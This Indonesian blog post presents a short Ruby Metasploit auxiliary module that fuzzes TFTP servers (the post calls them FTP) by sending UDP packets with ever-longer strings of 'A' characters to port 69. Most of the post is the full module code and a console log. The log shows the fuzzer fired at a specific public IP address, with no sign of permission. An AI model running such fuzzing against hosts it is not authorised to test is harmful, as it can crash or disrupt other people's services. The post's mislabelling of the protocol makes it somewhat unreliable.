Posts Subscribe comment Comments

FTP Fuzzer Metasploit Back !!!

Satu dari sekian banyak aspek Metasploit Framework adalah bagaimana dengan mudahnya kita membuat fungsi baru dengan menggunakan code-code program ruby yang ada. Contohnya fuzzer berikut yang sangat sederhana, kita dapa menggunakan dan memodifikasi seluruh code-code yang ada didalam Metasploit tersebut.



================================ > Script Codenya



#Metasploit



require 'msf/core'

class Metasploit3 < Msf::Auxiliary

        include Msf::Auxiliary::Scanner

        def initialize

                super(

                        'Name'           => 'WhiteCyber TFTP Fuzzer',

                        'Version'        => '$Revision: 1 $',

                        'Description'    => 'Mengirim String ke FTP',

                        'Author'         => 'CyberMuttaqin',

                        'License'        => MSF_LICENSE

                )

                register_options( [

                Opt::RPORT(69)

                ], self.class)

        end

        def run_host(ip)

                # Membuat Socket UDP

                udp_sock = Rex::Socket::Udp.create(

                        'Context'   =>

                                {

                                        'Msf'        => framework,

                                        'MsfExploit' => self,

                                }

                )

                count = 10  # Mengeset Jumlah

                while count < 2000  # Ketika kurang dari 2000 kita eksekusi

                        evil = "A" * count  # Set angka kali untuk kita munculkan angka "A"

                        pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Kita definisikan Payload

                        udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Kirim paket

                        print_status("Sending: #{evil}")  # Status update

                        resp = udp_sock.get(1)  # Tangkap hasil respon

                        count += 10  # Tambahkan count dan kita lakukan looping lagi sampai 2000

                end

        end

end



==================================



Kita lihat code ini bekerja dengan sempurna, meski hal ini nampak sederhana di permukaan, satu hal yang perlu dipertimbangkan adalah kode ini dapat kita gunakan kembali dan semua sudah disediakan oleh Metasploit Framework untuk kita.



================================== > kita ujicoba code kita tadi



| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|

| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|

                            | |

                            |_|





       =[ metasploit v3.5.1-release [core:3.5 api:1.0]

+ -- --=[ 635 exploits - 316 auxiliary

+ -- --=[ 215 payloads - 27 encoders - 8 nops

       =[ svn r11338 updated 81 days ago (2010.12.14)



Warning: This copy of the Metasploit Framework was last updated 81 days ago.

         We recommend that you update the framework at least every other day.

         For information on updating your copy of Metasploit, please see:

             http://www.metasploit.com/redmine/projects/framework/wiki/Updating



msf > use auxiliary/fuzzers/ftp/WhiteCyberTFTPFuzzer

msf auxiliary(WhiteCyberTFTPFuzzer) > set RHOSTS 72.14.203.121

RHOSTS => 72.14.203.121

msf auxiliary(WhiteCyberTFTPFuzzer) > run



[*] Sending: AAAAAAAAAA

[*] Sending: AAAAAAAAAAAAAAAAAAAA

[*] Sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] Sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] Sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA



seterusnya sampai



[*] Sending: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[*] Scanned 1 of 1 hosts (100% complete)

[*] Auxiliary module execution completed

msf auxiliary(WhiteCyberTFTPFuzzer) > quit

root@whitecyber-server:~#



====================================



Dalam contoh ini kita dapat mendefinisikan struktur payload, sehingga kita tidak kehilangan banyak waktu. dan dengan code-code fuzzing yang sudah tersedia ini kita tidak perlu meneliti protocol dulu. Inilah keistimewaan Metasploit Framework yang menjadi andalan Backtrack !!!

0

Silahkan Tulis Komentar Anda ...